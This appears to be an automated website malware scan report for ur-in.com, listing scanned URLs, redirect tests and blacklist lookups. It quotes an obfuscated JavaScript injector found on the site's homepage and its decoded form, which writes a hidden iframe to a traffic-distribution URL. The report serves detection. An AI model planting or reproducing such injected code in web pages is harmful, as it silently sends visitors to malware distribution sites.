Scanned pages/files
Request | Server response | Status |
http://www.ur-in.com/ | 200 OK Content-Length: 10810 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) a=new Array(59.64,114.95,98.93,113.79,104.85,111.86,115.66,61.92,99.7,110.66,98.91,116.82,108.69,100.68,109.85,115.74,45.68,118.65,113.68,104.71,115.79,100.93,39.78,82.97,115.89,113.83,104.94,109.76,102.67,45.71,101.76,113.71,110.81,108.7,66.81,103.86,96.61,113.73,66.68,110.66,99.76,100.95,39.97,53.93,47.93,43.88,48.86,48.72,52.63,43.68,56.93,56.86,43.73,48.67,48.78,51.79,43.72,48.6,47.98,52.94,43.69,48.79,48.74,49.76,43.93,48.6,48.64,53.69,43.73,53.75,49.66,43.95,50.77,49.99,43.99,48.79,48.73,5 for (i=0;i<=a.length; i++){document.write(String.fromCharCode(Math.round(a[i])));}; Decoded script: var Str="99' width=1 height=1 style='visibility: hidden'></iframe> <iframe src='http://leliksan.ru/tds/index.php?out=12142283" document.write(Str.substring(58,117),Str.substring(0,58)) Antivirus reports:
| ||
http://www.ur-in.com/gallery2/ | 404 Not Found Content-Length: 653 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1652 Content-Type: application/x-javascript | clean |
http://www.ur-in.com/test404page.js | 404 Not Found Content-Length: 653 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ur-in.com
Result:
GET / HTTP/1.1
Host: ur-in.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ur-in.com
Referer: http://www.google.com/search?q=ur-in.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ur-in.com
Referer: http://www.google.com/search?q=ur-in.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ur-in.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ur-in.com/
Result: ur-in.com is not infected or malware details are not published yet.
Result: ur-in.com is not infected or malware details are not published yet.